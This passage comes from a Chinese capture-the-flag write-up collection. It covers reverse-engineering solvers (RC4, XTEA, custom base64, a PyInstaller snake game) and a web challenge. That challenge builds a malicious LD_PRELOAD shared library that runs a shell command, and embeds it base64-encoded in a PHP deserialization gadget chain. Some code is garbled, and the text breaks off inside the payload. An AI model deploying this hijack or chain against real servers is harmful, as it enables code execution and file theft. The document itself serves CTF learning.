 int k = 0, i = 0, j = 0, t = 0;
 init_sbox(key, keyLen);
 for (int h = 0; h < dataLen; h++)
 {
  i = (i + 1) % 256;
  j = (j + sbox[i]) % 256;
  swap(&sbox[i], &sbox[j]);
  t = (sbox[i] + sbox[j]) % 256;
  k = sbox[t]; //求密钥流,并对明文加密
  data[h] ^= k;
 }
}
//查找下标所在位置
unsigned char findPos(const unsigned char* base64_map, unsigned char chr)
{
 for (int i = 0; i < strlen((const char*)base64_map); i++)
 {
  if (base64_map[i] == chr)
   return i;
 }
}
unsigned charbase64_decode(unsigned char* base64_table,const unsigned char* buf, unsigned int buflen)
{
 
 unsigned int len, mod = 0;
 unsigned char* res;
 if (buf[buflen - 1] == '=')
 {
  if (buf[buflen - 2] == '=')
  {
   mod = 1;
   len = buflen / 4 * 3 - 2;
  }
  else
  {
   mod = 2;
   len = buflen / 4 * 3 - 1;
  }
 }
 else
  len = buflen / 4 * 3;
 res = (unsigned char*)malloc(sizeof(unsigned char) * len);
 unsigned char tmp[4] = { 0 };

for (int i = 0, j = 0; j < len - mod; j += 3, i += 4)
{
tmp[0] = findPos(base64_table, buf[i]);  //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值
tmp[1] = findPos(base64_table, buf[i + 1]);
tmp[2] = findPos(base64_table, buf[i + 2]);
tmp[3] = findPos(base64_table, buf[i + 3]);
res[j] = tmp[0] << 2 | tmp[1] >> 4;  //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合  
res[j + 1] = tmp[1] << 4 | tmp[2] >> 2//取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合  
res[j + 2] = tmp[2] << 6 | tmp[3];    //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合 
}

switch (mod)
{
case 0:break;
case 1:
{
tmp[0] = findPos(base64_table, buf[buflen - 4]);
tmp[1] = findPos(base64_table, buf[buflen - 3]);
res[len - 1] = tmp[0] << 2 | tmp[1] >> 4;
break;
}
case 2: {
tmp[0] = findPos(base64_table, buf[buflen - 4]);
tmp[1] = findPos(base64_table, buf[buflen - 3]);
tmp[2] = findPos(base64_table, buf[buflen - 2]);
res[len - 2] = tmp[0] << 2 | tmp[1] >> 4;
res[len - 1] = tmp[1] << 4 | tmp[2] >> 2;
break;
}
}
return res;
}
void xtea_decipher(unsigned int num_rounds, uint32_t v[], uint32_t const key[4]) {
for (int j = 0; j < 16; j += 2) {
uint32_t v0 = v[j], v1 = v[j+1], delta = 0x9E3779B9, sum = delta * num_rounds;
for (int i = 0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[j] = v0; v[j+1] = v1;
}
}
void changeBase64Table(unsigned char* base64_table) {
int randPosA = 0, randPosB = 0;
for (int i = 0; i < 100; i++) {
randPosA = rand() % 64;
randPosB = rand() % 64;
swap(&base64_table[randPosA], &base64_table[randPosB]);
}
}

void generateKey(unsigned char* rc4_key,unsigned char* xtea_key,int len) {
for (int i = 0; i < len; i++) {
rc4_key[i] = rand() % 0xff;
xtea_key[i] = rand() % 0xff;
}
}

int main() {
//初始化
unsigned char base64_table[64] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
unsigned char encflag[64]={  0x59,0x1b,0xfd,0xb4,0x6b,0xb8,0xbe,0xd9,0xb3,0xd3,0x77,0xd6,0xf0,0x65,0x5f,0x18,0xa0,0x9d,0x3a,0x53,0x6d,0x4a,0x7b,0x26,0x74,0x3a,0x9c,0x4e,0x20,0x43,0x19,0xd8,0x72,0xed,0x95,0xb5,0x9c,0x5,0x22,0x56,0xcb,0x7a,0x11,0x91,0x9f,0x7a,0xbc,0xc,0x4a,0x69,0x6d,0xce,0x3d,0xb4,0xab,0x29,0x61,0xfa,0x62,0x32,0xb4,0xec,0x4c,0xb6};
int encflag_len = 64,flag_len=64/4*3, xtea_rounds = 100,rc4_key_len=16;
unsigned char rc4_key[16];
unsigned int xtea_key[4] = { 0 };
//伪随机数换表和生成key
srand(0x114514);
changeBase64Table(base64_table);//换表
srand(0x1919810);
generateKey(rc4_key, (unsigned char*)xtea_key, 16);//key均为16字节
//解密
xtea_decipher(xtea_rounds, encflag, xtea_key);
RC4_enc_dec(encflag, encflag_len, rc4_key, rc4_key_len);
unsigned char* decflag=base64_decode(base64_table,encflag, encflag_len);
printf("flag is:n");
for (int i = 0; i < flag_len; i++) {
printf("%c", decflag[i]);
}
printf("n");
system("pause");
return 0;
}

snake

解题过程

python打包的exe首先解包,首先你得需要pyinstxtractor.py文件,上github直接下了

【WP】2024年春秋杯夏季赛解题思路详解合集

然后在解包出来的文件夹中找到对应exe名字的snack文件uncompyle6 snack.pyc > snack.py,打开反编译之后的snack.py文件,你就会发现有问题

【WP】2024年春秋杯夏季赛解题思路详解合集

010查看snack.pyc之后发现Magic头被擦除,这边需要去解包出来后的base_library压缩包中找,从base_library中随便找一个pyc用010打开,把魔术头拼到snack中去就行

【WP】2024年春秋杯夏季赛解题思路详解合集

然后找个在线网站反编译一下或者直接decompyle3 snake.pyc也行,源码

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

import pygame
import random
import key

def initialize(key):
key_length = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % key_length]) % 256
S[i] = S[j]
S[j] = S[i]
return S

def generate_key_stream(S, length):
i = 0
j = 0
key_stream = []
for _ in range(length):
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i] = S[j]
S[j] = S[i]
key_stream.append(S[(S[i] + S[j]) % 256])
return key_stream

def decrypt(data, key):
S = initialize(key)
key_stream = generate_key_stream(S, len(data))
decrypted_data = None((lambda .0 = None: [ i ^ data[i] ^ key_stream[i] for i in .0 ])(range(len(data))))
return decrypted_data

pygame.init()
WINDOW_WIDTH = 800
WINDOW_HEIGHT = 600
SNAKE_SIZE = 20
SNAKE_SPEED = 20
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
pygame.display.set_caption('贪吃蛇')
font = pygame.font.Font(None, 36)
snake = [
(200, 200),
(210, 200),
(220, 200)]
snake_direction = (SNAKE_SPEED, 0)
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
key_bytes = bytes((lambda .0: [ ord(char) for char in .0 ])(key.xor_key))
data = [
101,
97,
39,
125,
218,
172,
205,
3,
235,
195,
72,
125,
89,
130,
103,
213,
120,
227,
193,
67,
174,
71,
162,
248,
244,
12,
238,
92,
160,
203,
185,
155]
decrypted_data = decrypt(bytes(data), key_bytes)
running = True
if running:
window.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN or event.key == pygame.K_UP:
snake_direction = (0, -SNAKE_SPEED)
elif event.key == pygame.K_DOWN:
snake_direction = (0, SNAKE_SPEED)
elif event.key == pygame.K_LEFT:
snake_direction = (-SNAKE_SPEED, 0)
elif event.key == pygame.K_RIGHT:
snake_direction = (SNAKE_SPEED, 0)
continue
snake_head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])
snake.insert(0, snake_head)
snake.pop()
if snake[0] == food:
food = ((random.randint(0, WINDOW_WIDTH - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE, (random.randint(0, WINDOW_HEIGHT - SNAKE_SIZE) // SNAKE_SIZE) * SNAKE_SIZE)
snake.append(snake[-1])
if snake[0][0] < 0 and snake[0][0] >= WINDOW_WIDTH and snake[0][1] < 0 and snake[0][1] >= WINDOW_HEIGHT or snake[0] in snake[1:]:
running = False
for segment in snake:
pygame.draw.rect(window, WHITE, (segment[0], segment[1], SNAKE_SIZE, SNAKE_SIZE))
pygame.draw.rect(window, RED, (food[0], food[1], SNAKE_SIZE, SNAKE_SIZE))
score_text = font.render(f'''Score: {len(snake)}''', True, WHITE)
speed_text = font.render(f'''Speed: {SNAKE_SPEED}''', True, WHITE)
window.blit(score_text, (10, 10))
window.blit(speed_text, (10, 40))
score = len(snake)
if score >= 9999:
flag_text = font.render('Flag: ' + decrypted_data.decode(), True, WHITE)
window.blit(flag_text, (10, 70))
pygame.display.update()
pygame.time.Clock().tick(10)
continue
pygame.quit()

 

key从下图exe解包之后的PYZ文件夹中找

【WP】2024年春秋杯夏季赛解题思路详解合集

找个在线的

【WP】2024年春秋杯夏季赛解题思路详解合集

这里是魔改了RC4 魔改逻辑就是多加了一个循环下标 i 的异或

import pygame
import random

key='V3rY_v3Ry_Ez'

def initialize(key):
key_length = len(key)
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % key_length]) % 256
S[i], S[j] = S[j], S[i]
return S

def generate_key_stream(S, length):
i = 0
j = 0
key_stream = []
for _ in range(length):
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
key_stream.append(S[(S[i] + S[j]) % 256])
return key_stream

def decrypt(data, key):
S = initialize(key)
key_stream = generate_key_stream(S, len(data))
decrypted_data = bytes([i^data[i] ^ key_stream[i] for i in range(len(data))])
return decrypted_data

pygame.init()

key_bytes = bytes([ord(char) for char in key])

data = [0x65,0x61,0x27,0x7D,0xDA,0xAC,
0xCD,0x03,0xEB,0xC3,0x48,0x7D,
0x59,0x82,0x67,0xD5,0x78,0xE3,
0xC1,0x43,0xAE,0x47,0xA2,0xF8,
0xF4,0x0C,0xEE,0x5C,0xA0,0xCB,
0xB9,0x9B]

print(decrypt(bytes(data), key_bytes))

 

Hijack

解题过程

生成恶意.so文件

#include <stdlib.h>
#include <string.h>
void payload() {
    system("cat /f*");
}
int getpagesize() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}
gcc -shared -fPIC Harder.c -o Harder.so
cat Harder.so |base64 >1.txt

pop1:

<?php
highlight_file(__FILE__);
//error_reporting(E_ALL);
//ini_set('display_errors', 1);
//system("cat *");
function filter($a)
{
    $pattern = array(''''"','%','(',')',';','bash');
    $pattern = '/' . implode('|', $pattern) . '/i';
    if(preg_match($pattern,$a)){
        die("No inject");
    }
    return $a;
}

class Env{
public $key;
public $value;
public $math;
public function __toString()
{
$key=filter($this->key);
$value=filter($this->value);

putenv("$key=$value");
system("cat robots.txt");
}
public function __wakeup()
{
echo "cccc";
if (isset($this->math->flag))
{
echo "YesYes";
else {
echo "YesYesYes";
}
}
}
class DIFF{
public $callback;
public $back;
private $flag;
public function __construct()
{
$this->callback = new FUN;
$this->callback->value = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXFLwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXKLwAA/yXMLwAADx9AAP8lyi8AAGgAAAAA6eD/////JcIvAABoAQAAAOnQ/////yW6LwAAaAIAAADpwP////8lsi8AAGgDAAAA6bD/////JWovAABmkAAAAAAAAAAASI09oS8AAEiNBZovAABIOfh0FUiLBS4vAABIhcB0Cf/gDx+AAAAAAMMPH4AAAAAASI09cS8AAEiNNWovAABIKf5IifBIwe4/SMH4A0gBxkjR/nQUSIsF/S4AAEiFwHQI/+BmDx9EAADDDx+AAAAAAPMPHvqAPS0vAAAAdStVSIM92i4AAABIieV0DEiLPQ4vAADoWf///+hk////xgUFLwAAAV3DDx8Aww8fgAAAAADzDx766Xf///9VSInlSI0FvA4AAEiJx+j0/v//kF3DVUiJ5UiNBa4OAABIicfozv7//0iFwHUHuAAAAADrGUiNBZMOAABIicfo4/7//7gAAAAA6Mn+//9dwwAAAEiD7AhIg8QIwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA